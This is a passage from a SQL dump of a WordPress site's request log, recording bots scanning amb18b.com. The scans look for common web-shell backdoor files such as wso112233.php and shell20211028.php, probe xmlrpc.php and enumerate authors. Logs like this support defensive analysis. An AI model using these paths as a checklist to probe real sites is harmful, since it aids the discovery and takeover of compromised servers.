04:08:35'),(9242,'https://amb18b.com/xleet.php','40.236.134.22','https://duckduckgo.com/',1,'2025-11-22 04:08:37','2025-11-22 04:08:37'),(9243,'https://amb18b.com/wp-admin/includes/','226.208.202.29','https://duckduckgo.com/',1,'2025-11-22 04:08:39','2025-11-22 04:08:39'),(9244,'https://amb18b.com/wp-good.php','205.63.185.47','https://www.google.com/',1,'2025-11-22 04:08:43','2025-11-22 04:08:43'),(9245,'https://amb18b.com/wp-includes/Text/Diff/Renderer/','162.14.74.8','https://duckduckgo.com/',1,'2025-11-22 04:08:44','2025-11-22 04:08:44'),(9246,'https://amb18b.com/wp-includes/style-engine/','160.50.26.8','https://www.yahoo.com/',1,'2025-11-22 04:08:46','2025-11-22 04:08:46'),(9247,'https://amb18b.com/xmrlpc.php','205.1.216.95','https://www.yahoo.com/',1,'2025-11-22 04:08:50','2025-11-22 04:08:50'),(9248,'https://amb18b.com/asasx.php','86.127.252.36','https://www.google.fr/',1,'2025-11-22 04:08:52','2025-11-22 04:08:52'),(9249,'https://amb18b.com/autoload_classmap.php','157.111.4.111','https://www.yahoo.com/',1,'2025-11-22 04:08:55','2025-11-22 04:08:55'),(9250,'https://amb18b.com/cong.php','70.123.213.52','https://www.google.co.uk/',1,'2025-11-22 04:08:57','2025-11-22 04:08:57'),(9251,'https://amb18b.com/file2.php','179.181.185.175','https://www.yahoo.com/',1,'2025-11-22 04:09:00','2025-11-22 04:09:00'),(9252,'https://amb18b.com/wp-includes/IXR/','35.146.1.15','https://www.google.com/',1,'2025-11-22 04:09:09','2025-11-22 04:09:09'),(9253,'https://amb18b.com/wp-includes/block-supports/','25.53.46.1','https://www.google.de/',1,'2025-11-22 04:09:13','2025-11-22 04:09:13'),(9254,'https://amb18b.com/wp-includes/fonts/','248.226.76.108','https://www.google.de/',1,'2025-11-22 04:09:15','2025-11-22 04:09:15'),(9255,'https://amb18b.com/wp-includes/fonts/index.php','204.133.142.49','https://www.yahoo.com/',1,'2025-11-22 04:09:17','2025-11-22 04:09:17'),(9256,'https://amb18b.com/wp-includes/js/crop/','239.225.158.145','https://www.bing.com/',1,'2025-11-22 04:09:18','2025-11-22 04:09:18'),(9257,'https://amb18b.com/wp-includes/rest-api/','143.80.147.146','https://www.google.com/',1,'2025-11-22 04:09:20','2025-11-22 04:09:20'),(9258,'https://amb18b.com/wp-includes/widgets/','128.81.117.105','https://www.yahoo.com/',1,'2025-11-22 04:09:22','2025-11-22 04:09:22'),(9259,'https://amb18b.com/ds.php','158.130.151.242','https://www.google.co.uk/',1,'2025-11-22 04:09:24','2025-11-22 04:09:24'),(9260,'https://amb18b.com/f5.php','189.162.155.70','https://www.bing.com/',1,'2025-11-22 04:09:26','2025-11-22 04:09:26'),(9261,'https://amb18b.com/god4m.php','172.179.79.226','https://www.google.de/',1,'2025-11-22 04:09:28','2025-11-22 04:09:28'),(9262,'https://amb18b.com/test1.php','61.198.31.160','https://www.bing.com/',1,'2025-11-22 04:09:30','2025-11-22 04:09:30'),(9263,'https://amb18b.com/uploads/','251.124.233.146','https://www.google.com/',1,'2025-11-22 04:09:33','2025-11-22 04:09:33'),(9264,'https://amb18b.com/0.php','67.176.3.111','https://www.bing.com/',1,'2025-11-22 04:09:34','2025-11-22 04:09:34'),(9265,'https://amb18b.com/07.php','99.54.175.48','https://www.google.fr/',1,'2025-11-22 04:09:37','2025-11-22 04:09:37'),(9266,'https://amb18b.com/dropdown.php','69.188.157.147','https://www.google.com/',1,'2025-11-22 04:09:39','2025-11-22 04:09:39'),(9267,'https://amb18b.com/makeasmtp.php','230.201.175.93','https://duckduckgo.com/',1,'2025-11-22 04:09:41','2025-11-22 04:09:41'),(9268,'https://amb18b.com/wp-sigunq.php','201.215.146.222','https://duckduckgo.com/',1,'2025-11-22 04:09:42','2025-11-22 04:09:42'),(9269,'https://amb18b.com/wso112233.php','96.184.36.97','https://www.bing.com/',1,'2025-11-22 04:09:44','2025-11-22 04:09:44'),(9270,'https://amb18b.com/alfanew.php','133.156.146.7','https://www.google.com/',1,'2025-11-22 04:09:46','2025-11-22 04:09:46'),(9271,'https://amb18b.com/fw.php','185.191.111.107','https://www.google.de/',1,'2025-11-22 04:09:48','2025-11-22 04:09:48'),(9272,'https://amb18b.com/install.php','134.165.140.230','https://www.yahoo.com/',1,'2025-11-22 04:09:50','2025-11-22 04:09:50'),(9273,'https://amb18b.com/simple.php','206.20.137.151','https://www.google.co.uk/',1,'2025-11-22 04:09:53','2025-11-22 04:09:53'),(9274,'https://amb18b.com/inputs.php','70.0.49.47','https://www.google.com/',1,'2025-11-22 04:09:55','2025-11-22 04:09:55'),(9275,'https://amb18b.com/classsmtps.php','49.27.140.86','https://www.bing.com/',1,'2025-11-22 04:09:57','2025-11-22 04:09:57'),(9276,'https://amb18b.com/wp-blog-header.php','75.15.96.132','https://www.yahoo.com/',1,'2025-11-22 04:09:59','2025-11-22 04:09:59'),(9277,'https://amb18b.com/wp-trackback.php','35.191.53.223','https://www.google.de/',1,'2025-11-22 04:10:01','2025-11-22 04:10:01'),(9278,'https://amb18b.com/wp-signup.php','100.17.194.167','https://duckduckgo.com/',1,'2025-11-22 04:10:03','2025-11-22 04:10:03'),(9279,'https://amb18b.com/plugins.php','167.248.159.36','https://duckduckgo.com/',1,'2025-11-22 04:10:08','2025-11-22 04:10:08'),(9280,'https://amb18b.com/post.php','160.173.160.212','https://www.yahoo.com/',1,'2025-11-22 04:10:10','2025-11-22 04:10:10'),(9281,'https://amb18b.com/wp-2019.php','120.129.126.13','https://duckduckgo.com/',1,'2025-11-22 04:10:12','2025-11-22 04:10:12'),(9282,'https://amb18b.com/geju.php','232.90.59.181','https://www.bing.com/',1,'2025-11-22 04:10:14','2025-11-22 04:10:14'),(9283,'https://amb18b.com/wp.php','166.42.93.90','https://www.google.co.uk/',1,'2025-11-22 04:10:16','2025-11-22 04:10:16'),(9284,'https://amb18b.com/hoot.php','145.34.161.143','https://www.google.fr/',1,'2025-11-22 04:10:18','2025-11-22 04:10:18'),(9285,'https://amb18b.com/css.php','43.176.156.168','https://www.google.fr/',1,'2025-11-22 04:10:20','2025-11-22 04:10:20'),(9286,'https://amb18b.com/log.php','207.181.123.179','https://www.yahoo.com/',1,'2025-11-22 04:10:22','2025-11-22 04:10:22'),(9287,'https://amb18b.com/mail.php','94.215.29.177','https://www.bing.com/',1,'2025-11-22 04:10:24','2025-11-22 04:10:24'),(9288,'https://amb18b.com/bak.php','2.88.32.123','https://www.yahoo.com/',1,'2025-11-22 04:10:26','2025-11-22 04:10:26'),(9289,'https://amb18b.com/content.php','49.201.214.101','https://duckduckgo.com/',1,'2025-11-22 04:10:28','2025-11-22 04:10:28'),(9290,'https://amb18b.com/upfile.php','43.97.123.54','https://www.google.co.uk/',1,'2025-11-22 04:10:30','2025-11-22 04:10:30'),(9291,'https://amb18b.com/wp-conflg.php','145.246.206.148','https://www.google.co.uk/',1,'2025-11-22 04:10:32','2025-11-22 04:10:32'),(9292,'https://amb18b.com/bypass.php','179.239.139.172','https://www.google.de/',1,'2025-11-22 04:10:33','2025-11-22 04:10:33'),(9293,'https://amb18b.com/404.php','72.224.139.238','https://www.google.fr/',1,'2025-11-22 04:10:36','2025-11-22 04:10:36'),(9294,'https://amb18b.com/updates.php','154.71.63.44','https://www.bing.com/',1,'2025-11-22 04:10:38','2025-11-22 04:10:38'),(9295,'https://amb18b.com/radio.php','87.120.83.192','https://www.google.fr/',1,'2025-11-22 04:10:39','2025-11-22 04:10:39'),(9296,'https://amb18b.com/ae.php','172.103.18.142','https://www.google.de/',1,'2025-11-22 04:10:42','2025-11-22 04:10:42'),(9297,'https://amb18b.com/blog.php','28.49.229.62','https://www.yahoo.com/',1,'2025-11-22 04:10:44','2025-11-22 04:10:44'),(9298,'https://amb18b.com/themes.php','162.211.156.150','https://www.bing.com/',1,'2025-11-22 04:10:46','2025-11-22 04:10:46'),(9299,'https://amb18b.com/ini.php','11.45.101.97','https://www.google.fr/',1,'2025-11-22 04:10:48','2025-11-22 04:10:48'),(9300,'https://amb18b.com/as.php','232.162.240.145','https://www.google.fr/',1,'2025-11-22 04:10:50','2025-11-22 04:10:50'),(9301,'https://amb18b.com/shell.php','126.51.147.121','https://www.yahoo.com/',1,'2025-11-22 04:10:52','2025-11-22 04:10:52'),(9302,'https://amb18b.com/ws.php','239.112.135.21','https://www.google.fr/',1,'2025-11-22 04:10:54','2025-11-22 04:10:54'),(9303,'https://amb18b.com/1.php','95.113.173.8','https://duckduckgo.com/',1,'2025-11-22 04:10:56','2025-11-22 04:10:56'),(9304,'https://amb18b.com/123.php','70.79.54.166','https://duckduckgo.com/',1,'2025-11-22 04:10:58','2025-11-22 04:10:58'),(9305,'https://amb18b.com/9.php','115.156.119.88','https://duckduckgo.com/',1,'2025-11-22 04:11:00','2025-11-22 04:11:00'),(9306,'https://amb18b.com/admin-ajax.php','138.187.107.105','https://www.bing.com/',1,'2025-11-22 04:11:02','2025-11-22 04:11:02'),(9307,'https://amb18b.com/akc.php','113.27.6.151','https://www.google.com/',1,'2025-11-22 04:11:04','2025-11-22 04:11:04'),(9308,'https://amb18b.com/asd.php','99.158.192.191','https://www.google.com/',1,'2025-11-22 04:11:06','2025-11-22 04:11:06'),(9309,'https://amb18b.com/atomlib.php','54.55.60.76','https://duckduckgo.com/',1,'2025-11-22 04:11:08','2025-11-22 04:11:08'),(9310,'https://amb18b.com/axx.php','118.227.195.108','https://www.google.co.uk/',1,'2025-11-22 04:11:10','2025-11-22 04:11:10'),(9311,'https://amb18b.com/berax.php','190.160.117.164','https://www.google.co.uk/',1,'2025-11-22 04:11:12','2025-11-22 04:11:12'),(9312,'https://amb18b.com/checkbox.php','215.202.205.77','https://www.google.co.uk/',1,'2025-11-22 04:11:24','2025-11-22 04:11:24'),(9313,'https://amb18b.com/elp.php','72.161.36.103','https://www.bing.com/',1,'2025-11-22 04:11:27','2025-11-22 04:11:27'),(9314,'https://amb18b.com/file4.php','11.87.168.36','https://duckduckgo.com/',1,'2025-11-22 04:11:31','2025-11-22 04:11:31'),(9315,'https://amb18b.com/form.php','175.131.191.37','https://www.google.co.uk/',1,'2025-11-22 04:11:33','2025-11-22 04:11:33'),(9316,'https://amb18b.com/gecko.php','57.158.90.22','https://www.google.co.uk/',1,'2025-11-22 04:11:35','2025-11-22 04:11:35'),(9317,'https://amb18b.com/goods.php','227.183.237.120','https://www.google.de/',1,'2025-11-22 04:11:36','2025-11-22 04:11:36'),(9318,'https://amb18b.com/kyami.php','44.28.64.207','https://www.google.com/',1,'2025-11-22 04:11:38','2025-11-22 04:11:38'),(9319,'https://amb18b.com/manager.php','226.189.34.103','https://www.bing.com/',1,'2025-11-22 04:11:40','2025-11-22 04:11:40'),(9320,'https://amb18b.com/new.php','87.227.198.110','https://www.google.de/',1,'2025-11-22 04:11:42','2025-11-22 04:11:42'),(9321,'https://amb18b.com/wp-admin.php','142.114.15.5','https://www.google.de/',1,'2025-11-22 04:11:44','2025-11-22 04:11:44'),(9322,'https://amb18b.com/xmlrpc.php?rsd','43.133.91.48','Direct Access',1,'2025-11-22 04:13:46','2025-11-22 04:13:46'),(9323,'https://amb18b.com/xmlrpc.php','212.147.5.172','Direct Access',1,'2025-11-22 04:17:04','2025-11-22 04:17:04'),(9324,'https://amb18b.com/media/system/js/core.js','136.118.98.246','Direct Access',1,'2025-11-22 04:42:07','2025-11-22 04:42:07'),(9325,'https://amb18b.com/xmlrpc.php','198.23.238.240','Direct Access',1,'2025-11-22 05:05:38','2025-11-22 05:05:38'),(9326,'https://amb18b.com/xmlrpc.php','50.116.93.245','Direct Access',1,'2025-11-22 05:58:01','2025-11-22 05:58:01'),(9327,'https://amb18b.com/xmlrpc.php','2603:3:610f:6180::','Direct Access',1,'2025-11-22 06:52:01','2025-11-22 06:52:01'),(9328,'https://amb18b.com/xmlrpc.php','162.241.225.81','Direct Access',1,'2025-11-22 07:37:28','2025-11-22 07:37:28'),(9329,'https://amb18b.com/xmlrpc.php','2401:4900:8fc9:ac61:c0c0:872a:7751:bd73','Direct Access',1,'2025-11-22 08:01:15','2025-11-22 08:01:15'),(9330,'https://amb18b.com/xmlrpc.php','162.241.226.142','Direct Access',1,'2025-11-22 08:53:15','2025-11-22 08:53:15'),(9331,'https://amb18b.com//wp-includes/wlwmanifest.xml','34.60.60.253','Direct Access',1,'2025-11-22 09:28:01','2025-11-22 09:28:01'),(9332,'https://amb18b.com//xmlrpc.php?rsd','34.60.60.253','Direct Access',1,'2025-11-22 09:28:02','2025-11-22 09:28:02'),(9333,'https://amb18b.com//?author=2','34.60.60.253','Direct Access',1,'2025-11-22 09:28:04','2025-11-22 09:28:04'),(9334,'https://amb18b.com//?author=3','34.60.60.253','Direct Access',1,'2025-11-22 09:28:05','2025-11-22 09:28:05'),(9335,'https://amb18b.com//xmlrpc.php','34.60.60.253','Direct Access',1,'2025-11-22 09:28:06','2025-11-22 09:28:06'),(9336,'https://amb18b.com/xmlrpc.php','2603:3:6105:e00::','Direct Access',1,'2025-11-22 09:30:18','2025-11-22 09:30:18'),(9337,'https://amb18b.com/xmlrpc.php','152.42.231.133','Direct Access',1,'2025-11-22 10:12:57','2025-11-22 10:12:57'),(9338,'https://amb18b.com/xmlrpc.php','14.225.205.165','Direct Access',1,'2025-11-22 10:56:28','2025-11-22 10:56:28'),(9339,'https://amb18b.com/xmlrpc.php','2a02:c207:2273:660::1','Direct Access',1,'2025-11-22 11:54:52','2025-11-22 11:54:52'),(9340,'https://amb18b.com/xmlrpc.php','14.225.205.165','Direct Access',1,'2025-11-22 13:05:35','2025-11-22 13:05:35'),(9341,'https://amb18b.com/Alvin9999/https/fanfan1.net/daohang/','123.145.16.122','Direct Access',1,'2025-11-23 00:08:07','2025-11-23 00:08:07'),(9342,'https://amb18b.com/officialsite','123.145.16.122','Direct Access',1,'2025-11-23 00:08:09','2025-11-23 00:08:09'),(9343,'https://amb18b.com/static/favicon.ico','123.145.16.122','Direct Access',1,'2025-11-23 00:08:12','2025-11-23 00:08:12'),(9344,'https://amb18b.com/images/logo-cn-352x97_1.png','123.145.16.122','Direct Access',1,'2025-11-23 00:08:14','2025-11-23 00:08:14'),(9345,'https://amb18b.com/assets/images/logo-cn-vpnweb.png','123.145.16.122','Direct Access',1,'2025-11-23 00:08:17','2025-11-23 00:08:17'),(9346,'https://amb18b.com/static/images/home/VPNlogo.png','123.145.16.122','Direct Access',1,'2025-11-23 00:08:19','2025-11-23 00:08:19'),(9347,'https://amb18b.com/img/logo.png','123.145.16.122','Direct Access',1,'2025-11-23 00:08:21','2025-11-23 00:08:21'),(9348,'https://amb18b.com/static/icon/bjch.png','123.145.16.122','Direct Access',1,'2025-11-23 00:08:24','2025-11-23 00:08:24'),(9349,'https://amb18b.com/assets/images/icon-vpnweb.ico','123.145.16.122','Direct Access',1,'2025-11-23 00:08:26','2025-11-23 00:08:26'),(9350,'https://amb18b.com/assets/images/official-site/favicon.ico','123.145.16.122','Direct Access',1,'2025-11-23 00:08:28','2025-11-23 00:08:28'),(9351,'https://amb18b.com/v1/file/icon/seo/cdc3fff6-6034-46fb-8ef3-1746e374d4fc.png','123.145.16.122','Direct Access',1,'2025-11-23 00:08:31','2025-11-23 00:08:31'),(9352,'https://amb18b.com/fav-icon.ico','123.145.16.122','Direct Access',1,'2025-11-23 00:08:33','2025-11-23 00:08:33'),(9353,'https://amb18b.com/image/logo.ico','123.145.16.122','Direct Access',1,'2025-11-23 00:08:35','2025-11-23 00:08:35'),(9354,'https://amb18b.com/images/default.png','123.145.16.122','Direct Access',1,'2025-11-23 00:08:38','2025-11-23 00:08:38'),(9355,'https://amb18b.com/static/image/logo2.png','123.145.16.122','Direct Access',1,'2025-11-23 00:08:40','2025-11-23 00:08:40'),(9356,'https://amb18b.com/themes/custom/ahaspeed/favicon.ico','123.145.16.122','Direct Access',1,'2025-11-23 00:08:42','2025-11-23 00:08:42'),(9357,'https://amb18b.com/image/favicon.png','123.145.16.122','Direct Access',1,'2025-11-23 00:08:47','2025-11-23 00:08:47'),(9358,'https://amb18b.com/image/favicon.ico','123.145.16.122','Direct Access',1,'2025-11-23 00:08:49','2025-11-23 00:08:49'),(9359,'https://amb18b.com/images/log1.png','123.145.16.122','Direct Access',1,'2025-11-23 00:08:51','2025-11-23 00:08:51'),(9360,'https://amb18b.com/details/images/favicon.ico','123.145.16.122','Direct Access',1,'2025-11-23 00:08:54','2025-11-23 00:08:54'),(9361,'https://amb18b.com/images/favicon.png','123.145.16.122','Direct Access',1,'2025-11-23 00:08:56','2025-11-23 00:08:56'),(9362,'https://amb18b.com/txpro/img/html_icon.ico','123.145.16.122','Direct Access',1,'2025-11-23 00:08:59','2025-11-23 00:08:59'),(9363,'https://amb18b.com/assets/fire_admin/images/logo.png','123.145.16.122','Direct Access',1,'2025-11-23 00:09:01','2025-11-23 00:09:01'),(9364,'https://amb18b.com/statics/abc/images/tu/abcpppin_03.png','123.145.16.122','Direct Access',1,'2025-11-23 00:09:04','2025-11-23 00:09:04'),(9365,'https://amb18b.com/images/pc/logo.png','123.145.16.122','Direct Access',1,'2025-11-23 00:09:06','2025-11-23 00:09:06'),(9366,'https://amb18b.com/images/favicon-icon.png','123.145.16.122','Direct Access',1,'2025-11-23 00:09:09','2025-11-23 00:09:09'),(9367,'https://amb18b.com/images/favicon-196x196.png','123.145.16.122','Direct Access',1,'2025-11-23 00:09:12','2025-11-23 00:09:12'),(9368,'https://amb18b.com/assets/img/favicon.png','123.145.16.122','Direct Access',1,'2025-11-23 00:09:14','2025-11-23 00:09:14'),(9369,'https://amb18b.com/static/images/logo.png','123.145.16.122','Direct Access',1,'2025-11-23 00:09:16','2025-11-23 00:09:16'),(9370,'https://amb18b.com/images/favicon.ico','123.145.16.122','Direct Access',1,'2025-11-23 00:09:19','2025-11-23 00:09:19'),(9371,'https://amb18b.com/static/picture/logo_jg2.png','123.145.16.122','Direct Access',1,'2025-11-23 00:09:21','2025-11-23 00:09:21'),(9372,'https://amb18b.com/favicon.png','123.145.16.122','Direct Access',1,'2025-11-23 00:09:23','2025-11-23 00:09:23'),(9373,'https://amb18b.com/theme/Bob-Theme-Argon/favicon.ico','123.145.16.122','Direct Access',1,'2025-11-23 00:09:26','2025-11-23 00:09:26'),(9374,'https://amb18b.com/imgs/logox.png','123.145.16.122','Direct Access',1,'2025-11-23 00:09:28','2025-11-23 00:09:28'),(9375,'https://amb18b.com/assets/index/kuailian/image/favicon.ico','123.145.16.122','Direct Access',1,'2025-11-23 00:09:30','2025-11-23 00:09:30'),(9376,'https://amb18b.com/img/logo_512.png','123.145.16.122','Direct Access',1,'2025-11-23 00:09:33','2025-11-23 00:09:33'),(9377,'https://amb18b.com/Alvin9999/https/fanfan1.net/daohang/','119.164.100.127','Direct Access',1,'2025-11-23 00:09:44','2025-11-23 00:09:44'),(9378,'https://amb18b.com/officialsite','119.164.100.127','Direct Access',1,'2025-11-23 00:09:46','2025-11-23 00:09:46'),(9379,'https://amb18b.com/static/favicon.ico','119.164.100.127','Direct Access',1,'2025-11-23 00:09:50','2025-11-23 00:09:50'),(9380,'https://amb18b.com/images/logo-cn-352x97_1.png','119.164.100.127','Direct Access',1,'2025-11-23 00:09:52','2025-11-23 00:09:52'),(9381,'https://amb18b.com/assets/images/logo-cn-vpnweb.png','119.164.100.127','Direct Access',1,'2025-11-23 00:09:54','2025-11-23 00:09:54'),(9382,'https://amb18b.com/static/images/home/VPNlogo.png','119.164.100.127','Direct Access',1,'2025-11-23 00:09:57','2025-11-23 00:09:57'),(9383,'https://amb18b.com/img/logo.png','119.164.100.127','Direct Access',1,'2025-11-23 00:09:59','2025-11-23 00:09:59'),(9384,'https://amb18b.com/static/icon/bjch.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:01','2025-11-23 00:10:01'),(9385,'https://amb18b.com/assets/images/icon-vpnweb.ico','119.164.100.127','Direct Access',1,'2025-11-23 00:10:03','2025-11-23 00:10:03'),(9386,'https://amb18b.com/assets/images/official-site/favicon.ico','119.164.100.127','Direct Access',1,'2025-11-23 00:10:05','2025-11-23 00:10:05'),(9387,'https://amb18b.com/v1/file/icon/seo/cdc3fff6-6034-46fb-8ef3-1746e374d4fc.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:08','2025-11-23 00:10:08'),(9388,'https://amb18b.com/fav-icon.ico','119.164.100.127','Direct Access',1,'2025-11-23 00:10:10','2025-11-23 00:10:10'),(9389,'https://amb18b.com/image/logo.ico','119.164.100.127','Direct Access',1,'2025-11-23 00:10:12','2025-11-23 00:10:12'),(9390,'https://amb18b.com/images/default.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:14','2025-11-23 00:10:14'),(9391,'https://amb18b.com/static/image/logo2.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:16','2025-11-23 00:10:16'),(9392,'https://amb18b.com/themes/custom/ahaspeed/favicon.ico','119.164.100.127','Direct Access',1,'2025-11-23 00:10:18','2025-11-23 00:10:18'),(9393,'https://amb18b.com/image/favicon.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:22','2025-11-23 00:10:22'),(9394,'https://amb18b.com/image/favicon.ico','119.164.100.127','Direct Access',1,'2025-11-23 00:10:24','2025-11-23 00:10:24'),(9395,'https://amb18b.com/images/log1.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:26','2025-11-23 00:10:26'),(9396,'https://amb18b.com/details/images/favicon.ico','119.164.100.127','Direct Access',1,'2025-11-23 00:10:29','2025-11-23 00:10:29'),(9397,'https://amb18b.com/images/favicon.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:31','2025-11-23 00:10:31'),(9398,'https://amb18b.com/txpro/img/html_icon.ico','119.164.100.127','Direct Access',1,'2025-11-23 00:10:33','2025-11-23 00:10:33'),(9399,'https://amb18b.com/assets/fire_admin/images/logo.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:35','2025-11-23 00:10:35'),(9400,'https://amb18b.com/statics/abc/images/tu/abcpppin_03.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:37','2025-11-23 00:10:37'),(9401,'https://amb18b.com/images/pc/logo.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:40','2025-11-23 00:10:40'),(9402,'https://amb18b.com/images/favicon-icon.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:42','2025-11-23 00:10:42'),(9403,'https://amb18b.com/images/favicon-196x196.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:44','2025-11-23 00:10:44'),(9404,'https://amb18b.com/assets/img/favicon.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:46','2025-11-23 00:10:46'),(9405,'https://amb18b.com/static/images/logo.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:48','2025-11-23 00:10:48'),(9406,'https://amb18b.com/images/favicon.ico','119.164.100.127','Direct Access',1,'2025-11-23 00:10:50','2025-11-23 00:10:50'),(9407,'https://amb18b.com/static/picture/logo_jg2.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:52','2025-11-23 00:10:52'),(9408,'https://amb18b.com/favicon.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:54','2025-11-23 00:10:54'),(9409,'https://amb18b.com/theme/Bob-Theme-Argon/favicon.ico','119.164.100.127','Direct Access',1,'2025-11-23 00:10:56','2025-11-23 00:10:56'),(9410,'https://amb18b.com/imgs/logox.png','119.164.100.127','Direct Access',1,'2025-11-23 00:10:59','2025-11-23 00:10:59'),(9411,'https://amb18b.com/assets/index/kuailian/image/favicon.ico','119.164.100.127','Direct Access',1,'2025-11-23 00:11:01','2025-11-23 00:11:01'),(9412,'https://amb18b.com/img/logo_512.png','119.164.100.127','Direct Access',1,'2025-11-23 00:11:03','2025-11-23 00:11:03'),(9413,'https://amb18b.com/kickstart.php','104.194.153.77','Direct Access',1,'2025-11-23 01:33:23','2025-11-23 01:33:23'),(9414,'https://amb18b.com/wp-admin/css/','217.76.49.137','Invalid Referrer',1,'2025-11-23 01:49:39','2025-11-23 01:49:39'),(9415,'https://amb18b.com/xmrlpc.php','136.162.25.43','https://www.google.co.uk/',1,'2025-11-23 02:01:15','2025-11-23 02:01:15'),(9416,'https://amb18b.com/abcd.php','149.9.221.225','https://www.bing.com/',1,'2025-11-23 02:01:18','2025-11-23 02:01:18'),(9417,'https://amb18b.com/admin.php','201.178.195.78','https://www.bing.com/',1,'2025-11-23 02:01:20','2025-11-23 02:01:20'),(9418,'https://amb18b.com/info.php','108.245.231.52','https://www.google.de/',1,'2025-11-23 02:01:22','2025-11-23 02:01:22'),(9419,'https://amb18b.com/edit.php','219.93.253.148','https://www.google.fr/',1,'2025-11-23 02:01:24','2025-11-23 02:01:24'),(9420,'https://amb18b.com/moon.php','22.169.222.252','https://duckduckgo.com/',1,'2025-11-23 02:01:26','2025-11-23 02:01:26'),(9421,'https://amb18b.com/classwithtostring.php','143.74.85.84','https://duckduckgo.com/',1,'2025-11-23 02:01:28','2025-11-23 02:01:28'),(9422,'https://amb18b.com/file4.php','255.51.238.199','https://www.google.com/',1,'2025-11-23 02:01:30','2025-11-23 02:01:30'),(9423,'https://amb18b.com/ioxi-o.php','17.216.129.225','https://www.google.fr/',1,'2025-11-23 02:01:31','2025-11-23 02:01:31'),(9424,'https://amb18b.com/wp-good.php','153.231.79.197','https://www.google.co.uk/',1,'2025-11-23 02:01:33','2025-11-23 02:01:33'),(9425,'https://amb18b.com/ds.php','110.29.90.80','https://www.yahoo.com/',1,'2025-11-23 02:01:35','2025-11-23 02:01:35'),(9426,'https://amb18b.com/bolt.php','243.246.58.240','https://www.google.fr/',1,'2025-11-23 02:01:37','2025-11-23 02:01:37'),(9427,'https://amb18b.com/new.php','237.47.3.91','https://www.google.co.uk/',1,'2025-11-23 02:01:39','2025-11-23 02:01:39'),(9428,'https://amb18b.com/.well-known/index.php','246.192.45.240','https://www.google.fr/',1,'2025-11-23 02:01:41','2025-11-23 02:01:41'),(9429,'https://amb18b.com/.well-known/acme-challenge/index.php','168.158.227.85','https://duckduckgo.com/',1,'2025-11-23 02:01:42','2025-11-23 02:01:42'),(9430,'https://amb18b.com/wp-includes/Requests/Text/index.php','133.85.216.136','https://www.google.de/',1,'2025-11-23 02:01:44','2025-11-23 02:01:44'),(9431,'https://amb18b.com/wp-includes/Requests/Text/admin.php','31.158.233.243','https://www.google.co.uk/',1,'2025-11-23 02:01:46','2025-11-23 02:01:46'),(9432,'https://amb18b.com/.well-known/wso112233.php','88.81.108.138','https://www.google.fr/',1,'2025-11-23 02:01:47','2025-11-23 02:01:47'),(9433,'https://amb18b.com/wso112233.php','115.28.105.178','https://www.google.co.uk/',1,'2025-11-23 02:01:49','2025-11-23 02:01:49'),(9434,'https://amb18b.com/.well-knownold/wso112233.php','67.122.49.26','https://www.google.com/',1,'2025-11-23 02:01:51','2025-11-23 02:01:51'),(9435,'https://amb18b.com/.well-known/acme-challenge/wso112233.php','6.37.172.111','https://www.bing.com/',1,'2025-11-23 02:01:53','2025-11-23 02:01:53'),(9436,'https://amb18b.com/.well-known/pkivalidation/wso112233.php','242.116.235.224','https://www.google.com/',1,'2025-11-23 02:01:55','2025-11-23 02:01:55'),(9437,'https://amb18b.com/wp-includes/wso112233.php','187.48.28.6','https://www.google.co.uk/',1,'2025-11-23 02:02:02','2025-11-23 02:02:02'),(9438,'https://amb18b.com/wp-admin/wso112233.php','55.5.8.63','https://www.google.co.uk/',1,'2025-11-23 02:02:04','2025-11-23 02:02:04'),(9439,'https://amb18b.com/.well-known/shell20211028.php','122.212.197.104','https://www.google.de/',1,'2025-11-23 02:02:08','2025-11-23 02:02:08'),(9440,'https://amb18b.com/shell20211028.php','52.150.160.78','https://www.yahoo.com/',1,'2025-11-23 02:02:09','2025-11-23 02:02:09'),(9441,'https://amb18b.com/.well-knownold/shell20211028.php','171.52.18.255','https://www.google.fr/',1,'2025-11-23 02:02:11','2025-11-23 02:02:11'),(9442,'https://amb18b.com/.well-known/acme-challenge/shell20211028.php','193.65.26.95','https://www.google.com/',1,'2025-11-23 02:02:13','2025-11-23 02:02:13'),(9443,'https://amb18b.com/.well-known/pkivalidation/shell20211028.php','97.14.135.158','https://www.google.de/',1,'2025-11-23 02:02:15','2025-11-23 02:02:15'),(9444,'https://amb18b.com/wp-includes/shell20211028.php','163.12.26.140','https://www.google.fr/',1,'2025-11-23 02:02:21','2025-11-23 02:02:21'),(9445,'https://amb18b.com/wp-admin/shell20211028.php','148.198.139.241','https://duckduckgo.com/',1,'2025-11-23 02:02:23','2025-11-23 02:02:23'),(9446,'https://amb18b.com/.well-known/bala.php','83.24.199.178','https://www.google.co.uk/',1,'2025-11-23 02:02:27','2025-11-23 02:02:27'),(9447,'https://amb18b.com/bala.php','77.148.29.6','https://www.yahoo.com/',1,'2025-11-23 02:02:28','2025-11-23 02:02:28'),(9448,'https://amb18b.com/.well-knownold/bala.php','89.22.85.239','https://www.google.co.uk/',1,'2025-11-23 02:02:30','2025-11-23 02:02:30'),(9449,'https://amb18b.com/.well-known/acme-challenge/bala.php','37.210.30.136','https://duckduckgo.com/',1,'2025-11-23 02:02:32','2025-11-23 02:02:32'),(9450,'https://amb18b.com/.well-known/pkivalidation/bala.php','170.51.227.1','https://www.google.com/',1,'2025-11-23 02:02:34','2025-11-23 02:02:34'),(9451,'https://amb18b.com/wp-includes/bala.php','224.233.112.20','https://duckduckgo.com/',1,'2025-11-23 02:02:40','2025-11-23 02:02:40'),(9452,'https://amb18b.com/wp-admin/bala.php','5.130.233.237','https://www.bing.com/',1,'2025-11-23 02:02:42','2025-11-23 02:02:42'),(9453,'https://amb18b.com/dropdown.php','89.174.47.68','https://www.google.com/',1,'2025-11-23 02:02:46','2025-11-23 